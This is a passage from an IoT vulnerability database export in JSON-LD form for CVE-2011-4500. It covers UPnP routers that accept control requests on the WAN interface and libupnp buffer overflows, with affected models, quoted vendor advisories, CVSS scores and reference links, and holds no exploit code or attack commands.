"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Design Error",
"sources": [
{
"db": "BID",
"id": "10441"
},
{
"db": "CNNVD",
"id": "CNNVD-200412-618"
}
],
"trust": 0.9
}
}
VAR-201111-0179
Vulnerability from variot - Updated: 2023-12-18 12:09The UPnP IGD implementation on the Cisco Linksys WRT54GX with firmware 2.00.05, when UPnP is enabled, configures the SOAP server to listen on the WAN port, which allows remote attackers to administer the firewall via SOAP requests. The Portable SDK for UPnP Devices libupnp library contains multiple buffer overflow vulnerabilities. Devices that use libupnp may also accept UPnP queries over the WAN interface, therefore exposing the vulnerabilities to the internet. Universal Plug and Play (UPnP) Multiple compatible routers have vulnerabilities with insufficient access restrictions. UPnP For supported routers, WAN Unintended from the side interface UPnP There is a vulnerability that allows the request to be accepted.An unauthenticated remote third party could obtain local network information or use the product as a proxy. Universal Plug and Play (UPnP) is a network protocol that is mostly used for personal computer device discovery and communication with other devices and the Internet. These requests can be used to connect to the internal host or proxy connection of the NAT firewall. Remote unauthenticated attackers can exploit vulnerabilities to scan internal hosts or communicate via the device proxy Internet. The following devices are affected: Cisco Linksys WRT54G firmware version prior to 4.30.5 Cisco Linksys WRT54GS v1 through v3 firmware versions prior to 4.71.1 Cisco Linksys WRT54GS v4 firmware versions prior to 1.06.1 Cisco Linksys WRT54GX firmware 2.00.05 Edimax BR-6104K prior to 3.25 Edimax 6114Wg Canyon-Tech CN-WF512 firmware version 1.83 Canyon-Tech CN-WF514 firmware version 2.08 Sitecom WL-153 prior to firmware 1.39 Sitecom WL-111 Sweex LB000021 firmware version 3.15 ZyXEL P-330W SpeedTouch 5x6 firmware versions prior to 6.2.29 Thomson TG585 firmware versions prior to 7.4.3.2. ----------------------------------------------------------------------
The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/
TITLE: Siemens OZW / OZS Multiple Products libupnp Buffer Overflow Vulnerabilities
SECUNIA ADVISORY ID: SA52035
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/52035/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=52035
RELEASE DATE: 2013-01-31
DISCUSS ADVISORY: http://secunia.com/advisories/52035/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/52035/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=52035
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: Multiple vulnerabilities have been reported in multiple Siemens OZW and OZS products, which can be exploited by malicious people to compromise a vulnerable device.
1) Multiple vulnerabilities are caused due to a bundled version of libupnp.
For more information: SA51949
2) Multiple boundary errors within the "unique_service_name()" function (ssdp/ssdp_ctrlpt.c) in libupnp when handling SSDP requests can be exploited to cause stack-based buffer overflows. The vendor is planning to provide fixes with upcoming firmware updates.
PROVIDED AND/OR DISCOVERED BY: 2) Rapid7
ORIGINAL ADVISORY: Siemens SSA-963338: http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf
Rapid7: https://community.rapid7.com/docs/DOC-2150 https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. This library is used in several vendor network devices in addition to media streaming and file sharing applications. These vulnerabilities were disclosed on January 29th, 2013 in a CERT Vulnerability Note, VU#922681, which can be viewed at:
http://www.kb.cert.org/vuls/id/922681
Cisco is currently evaluating products for possible exposure to these vulnerabilities. This advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux)
iF4EAREIAAYFAlEIJZ8ACgkQUddfH3/BbTrUagD9FnKSVkc2iIfGs+7c8SVPT26+ ga5hYEz9UMUnitcqnbcBAIKe6KnkR6he2zbstVtbTKtqSjE7pfVb3lTKVZSeAkM5 =6sTu -----END PGP SIGNATURE-----
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201111-0179",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "linksys wrt54gx router",
"scope": "eq",
"trust": 1.6,
"vendor": "cisco",
"version": "2.00.05"
},
{
"model": "wrt54gx",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "2.0"
},
{
"model": "br-6104k",
"scope": "eq",
"trust": 0.9,
"vendor": "edimax",
"version": "0"
},
{
"model": "6114wg",
"scope": "eq",
"trust": 0.9,
"vendor": "edimax",
"version": "0"
},
{
"model": "cn-wf514",
"scope": "eq",
"trust": 0.9,
"vendor": "canyon tech",
"version": "2.08"
},
{
"model": "cn-wf512",
"scope": "eq",
"trust": 0.9,
"vendor": "canyon tech",
"version": "1.83"
},
{
"model": "p-330w",
"scope": "eq",
"trust": 0.9,
"vendor": "zyxel",
"version": "0"
},
{
"model": "tg585 router",
"scope": "eq",
"trust": 0.9,
"vendor": "thomson",
"version": "0"
},
{
"model": null,
"scope": "eq",
"trust": 0.9,
"vendor": "speedtouch",
"version": "5x60"
},
{
"model": "wl-153",
"scope": "eq",
"trust": 0.9,
"vendor": "sitcom",
"version": "0"
},
{
"model": "wl-111",
"scope": "eq",
"trust": 0.9,
"vendor": "sitcom",
"version": "0"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "canyon tech",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "edimax computer",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "linksys a division of cisco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sitecom",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sweex",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "technicolor",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "zyxel",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "axis",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "fujitsu",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "huawei",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "linksys",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "nec",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "siemens",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sony",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "synology",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ipitomy",
"version": null
},
{
"model": "linksys wrt54gx router",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "wrt54gx",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco linksys",
"version": "firmware 2.00.05"
},
{
"model": "",
"scope": null,
"trust": 0.8,
"vendor": "multiple vendors",
"version": null
},
{
"model": "wrt54g beta/2.0",
"scope": "eq",
"trust": 0.6,
"vendor": "linksys",
"version": "4.04.20.6/4.04.0.7/3.03.3.6/3.03.1.3/2.02.4.4/2.02.02.82.00.8"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.20.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.0.7"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.3.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.1.3"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.4.4"
},
{
"model": "wrt54g beta",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.02.8"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.00.8"
},
{
"model": "tg585 router",
"scope": "ne",
"trust": 0.3,
"vendor": "thomson",
"version": "7.4.3.2"
},
{
"model": null,
"scope": "ne",
"trust": 0.3,
"vendor": "speedtouch",
"version": "5x66.2.29"
},
{
"model": "wl-153",
"scope": "ne",
"trust": 0.3,
"vendor": "sitcom",
"version": "1.39"
},
{
"model": "wrt54g",
"scope": "ne",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.01.0.6"
},
{
"model": "br-6104k",
"scope": "ne",
"trust": 0.3,
"vendor": "edimax",
"version": "3.25"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5055"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003030"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "NVD",
"id": "CVE-2011-4500"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-362"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:cisco:linksys_wrt54gx_router_firmware:2.00.05:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54gx:2.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2011-4500"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Daniel Garcia",
"sources": [
{
"db": "BID",
"id": "50810"
}
],
"trust": 0.3
},
"cve": "CVE-2011-4500",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CARNEGIE MELLON",
"availabilityImpact": "COMPLETE",
"availabilityRequirement": "NOT DEFINED",
"baseScore": 9.4,
"collateralDamagePotential": "NOT DEFINED",
"confidentialityImpact": "NONE",
"confidentialityRequirement": "NOT DEFINED",
"enviromentalScore": 8.0,
"exploitability": "PROOF-OF-CONCEPT",
"exploitabilityScore": 10.0,
"id": "VU#357851",
"impactScore": 9.2,
"integrityImpact": "COMPLETE",
"integrityRequirement": "NOT DEFINED",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"remediationLevel": "WORKAROUND",
"reportConfidence": "CONFIRMED",
"severity": "HIGH",
"targetDistribution": "NOT DEFINED",
"trust": 0.8,
"userInterationRequired": null,
"vector_string": "AV:N/AC:L/Au:N/C:N/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2011-4500",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-52445",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2011-4500",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#357851",
"trust": 0.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201111-362",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-52445",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "VULHUB",
"id": "VHN-52445"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003030"
},
{
"db": "NVD",
"id": "CVE-2011-4500"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-362"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The UPnP IGD implementation on the Cisco Linksys WRT54GX with firmware 2.00.05, when UPnP is enabled, configures the SOAP server to listen on the WAN port, which allows remote attackers to administer the firewall via SOAP requests. The Portable SDK for UPnP Devices libupnp library contains multiple buffer overflow vulnerabilities. Devices that use libupnp may also accept UPnP queries over the WAN interface, therefore exposing the vulnerabilities to the internet. Universal Plug and Play (UPnP) Multiple compatible routers have vulnerabilities with insufficient access restrictions. UPnP For supported routers, WAN Unintended from the side interface UPnP There is a vulnerability that allows the request to be accepted.An unauthenticated remote third party could obtain local network information or use the product as a proxy. Universal Plug and Play (UPnP) is a network protocol that is mostly used for personal computer device discovery and communication with other devices and the Internet. These requests can be used to connect to the internal host or proxy connection of the NAT firewall. Remote unauthenticated attackers can exploit vulnerabilities to scan internal hosts or communicate via the device proxy Internet. \nThe following devices are affected:\nCisco Linksys WRT54G firmware version prior to 4.30.5\nCisco Linksys WRT54GS v1 through v3 firmware versions prior to 4.71.1\nCisco Linksys WRT54GS v4 firmware versions prior to 1.06.1\nCisco Linksys WRT54GX firmware 2.00.05\nEdimax BR-6104K prior to 3.25\nEdimax 6114Wg\nCanyon-Tech CN-WF512 firmware version 1.83\nCanyon-Tech CN-WF514 firmware version 2.08\nSitecom WL-153 prior to firmware 1.39\nSitecom WL-111\nSweex LB000021 firmware version 3.15\nZyXEL P-330W\nSpeedTouch 5x6 firmware versions prior to 6.2.29\nThomson TG585 firmware versions prior to 7.4.3.2. ----------------------------------------------------------------------\n\nThe final version of the CSI 6.0 has been released. \nFind out why this is not just another Patch Management solution: http://secunia.com/blog/325/\n\n----------------------------------------------------------------------\n\nTITLE:\nSiemens OZW / OZS Multiple Products libupnp Buffer Overflow\nVulnerabilities\n\nSECUNIA ADVISORY ID:\nSA52035\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/52035/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035\n\nRELEASE DATE:\n2013-01-31\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/52035/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/52035/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nMultiple vulnerabilities have been reported in multiple Siemens OZW\nand OZS products, which can be exploited by malicious people to\ncompromise a vulnerable device. \n\n1) Multiple vulnerabilities are caused due to a bundled version of\nlibupnp. \n\nFor more information:\nSA51949\n\n2) Multiple boundary errors within the \"unique_service_name()\"\nfunction (ssdp/ssdp_ctrlpt.c) in libupnp when handling SSDP requests\ncan be exploited to cause stack-based buffer overflows. The vendor is planning\nto provide fixes with upcoming firmware updates. \n\nPROVIDED AND/OR DISCOVERED BY:\n2) Rapid7\n\nORIGINAL ADVISORY:\nSiemens SSA-963338:\nhttp://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf\n\nRapid7:\nhttps://community.rapid7.com/docs/DOC-2150\nhttps://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. This library is used in several vendor network\ndevices in addition to media streaming and file sharing applications. \nThese vulnerabilities were disclosed on January 29th, 2013 in a CERT\nVulnerability Note, VU#922681, which can be viewed at:\n\nhttp://www.kb.cert.org/vuls/id/922681\n\nCisco is currently evaluating products for possible exposure to these\nvulnerabilities. This advisory is available at the following link:\n\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.11 (GNU/Linux)\n\niF4EAREIAAYFAlEIJZ8ACgkQUddfH3/BbTrUagD9FnKSVkc2iIfGs+7c8SVPT26+\nga5hYEz9UMUnitcqnbcBAIKe6KnkR6he2zbstVtbTKtqSjE7pfVb3lTKVZSeAkM5\n=6sTu\n-----END PGP SIGNATURE-----\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2011-4500"
},
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003030"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "CNVD",
"id": "CNVD-2011-5055"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "VULHUB",
"id": "VHN-52445"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
}
],
"trust": 4.86
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#357851",
"trust": 5.8
},
{
"db": "NVD",
"id": "CVE-2011-4500",
"trust": 3.4
},
{
"db": "SIEMENS",
"id": "SSA-963338",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#922681",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003030",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201111-362",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2011-5055",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "18224",
"trust": 0.6
},
{
"db": "BID",
"id": "50810",
"trust": 0.3
},
{
"db": "SECUNIA",
"id": "52035",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-52445",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "119949",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "119896",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5055"
},
{
"db": "VULHUB",
"id": "VHN-52445"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003030"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4500"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-362"
}
]
},
"id": "VAR-201111-0179",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5055"
},
{
"db": "VULHUB",
"id": "VHN-52445"
}
],
"trust": 1.4788191
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5055"
}
]
},
"last_update_date": "2023-12-18T12:09:30.385000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.cisco.com/"
},
{
"title": "Patch for Multiple Routers UPnP WAN Interface Remote Unauthorized Access Vulnerability (CNVD-2011-5055)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/6024"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5055"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003030"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-16",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-52445"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003030"
},
{
"db": "NVD",
"id": "CVE-2011-4500"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 4.4,
"url": "http://www.kb.cert.org/vuls/id/357851"
},
{
"trust": 2.8,
"url": "http://www.upnp-hacks.org/devices.html"
},
{
"trust": 1.6,
"url": "http://homekb.cisco.com/cisco2/ukp.aspx?vw=1\u0026articleid=28341"
},
{
"trust": 1.6,
"url": "http://jvn.jp/cert/jvnvu357851"
},
{
"trust": 0.9,
"url": "https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play"
},
{
"trust": 0.9,
"url": "https://community.rapid7.com/docs/doc-2150"
},
{
"trust": 0.9,
"url": "http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf"
},
{
"trust": 0.8,
"url": "http://toor.do/upnp.html"
},
{
"trust": 0.8,
"url": "http://www.h-online.com/security/news/item/upnp-enabled-routers-allow-attacks-on-lans-1329727.html"
},
{
"trust": 0.8,
"url": "http://toor.do/defcon-19-garcia-upnp-mapping-wp.pdf"
},
{
"trust": 0.8,
"url": "http://pupnp.sourceforge.net/"
},
{
"trust": 0.8,
"url": "https://community.rapid7.com/servlet/jiveservlet/download/2150-1-16596/securityflawsupnp.pdf"
},
{
"trust": 0.8,
"url": "http://www.rapid7.com/resources/free-security-software-downloads/universal-plug-and-play-jan-2013.jsp"
},
{
"trust": 0.8,
"url": "http://opentools.homeip.net/dev-tools-for-upnp"
},
{
"trust": 0.8,
"url": "http://upnp.sourceforge.net/"
},
{
"trust": 0.8,
